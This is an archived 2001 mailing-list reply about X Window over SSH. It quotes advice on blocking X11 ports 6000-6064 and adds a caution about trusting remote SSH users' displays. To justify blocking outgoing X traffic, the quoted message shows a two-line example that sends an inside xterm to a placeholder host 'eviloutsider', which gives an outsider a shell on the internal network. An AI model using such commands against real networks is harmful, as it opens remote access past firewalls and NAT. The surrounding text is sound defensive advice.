Re: X Window over SSH

From: Matthew Collins (pingu@zymurgy.org)
Date: 08/13/01


Date: Mon, 13 Aug 2001 13:57:03 +0100
From: Matthew Collins <pingu@zymurgy.org>
To: Rajeev Kumar <rajeev@rajeevnet.com>
Subject: Re: X Window over SSH
Message-ID: <20010813135703.B96299@keg.zymurgy.org>

On Fri, Aug 10, 2001 at 10:13:03AM -0400, Rajeev Kumar wrote:
> Greg,
> As you know X11 works in sort of reverse way as far as user perception of client/server
> matters. Once you are running X server on your machine it runs default on port 6000 but
> this can be relocated and in case of more than one display attached to you machine you can
> run X server listening to more than one port i.e 6000 for 1st display, 6001 for second
> display and so on. User on remote end throwing display on your machine will the setup
> environment variable like:
>
> setenv DISPLAy yourhost:0.0 (for firt display at port 6000)
> setenv DISPLAy yourhost:0.1 (for 2nd display, at port 6001)
>
> Generally you know xhost command can be used on server side to control access to your X
> server, but in general user run something like xhost + and leaving their X server open to all.
>
> Now very important part on firewall side:
> -----------------------------------------------
> [1] You surely block incoming port 6000-6064 (assuming nobody will run X server above
> 6064), so that will protect your inside users. I guess everybody does this by default
> these days.
>
> !!!!!!!! IMPORTANT !!!!!!!!!!
> [2] This one is important:
> You should also block outgoing 6000-6064 ports on your firewall. if you don't do this (and I
> know many company open all outgoing access) then anybody from inside your network can do
> something like this.
>
> inside% setenv DISPLAY eviloutsider:0.0
> inside% xterm&
>
> i.e that will give xterm to eviloutsider on your network machine. and user on evisoutsider
> machine then can do anything your inside users can do. like fireup web browser and looking
> to your intranet.
>
> This is also very dangerous even if you are using NAT. Generally people think if you using
> NAT(Hide NATin Checkpoint or Linux MASQ NAT) you are safe. Because nobody can connect to
> you from outside. Now see above in in NATed networks users from inside can provide xterm
> (or any X application) to outsider (since connection is from inside to outside). So in any
> case block 6000-6064 always (incoming/outgoing )
>
>
> With SSH you can port forward X11 traffic over SSH channel. So that is safe. Means only
> ssh users can fireup X service and those are trusted :-)
>
Bear in mind with this situation:

[ trusted user a ] ---- <internet> ---- [fw] ---- <lan> ---- [ ssh host b ]

when "a" ssh's into "b" and runs xterm the xterms security is dependant on
the security of the system at "trusted user a" that is outside the firewall.

If you are going to let folks pull X applications back through your firewall
using SSH or otherwise you need to ensure that their systems outside the LAN
have secured X displays. (xhost -, filtered ports, patches up to date, decent
passwords, etc)

Matt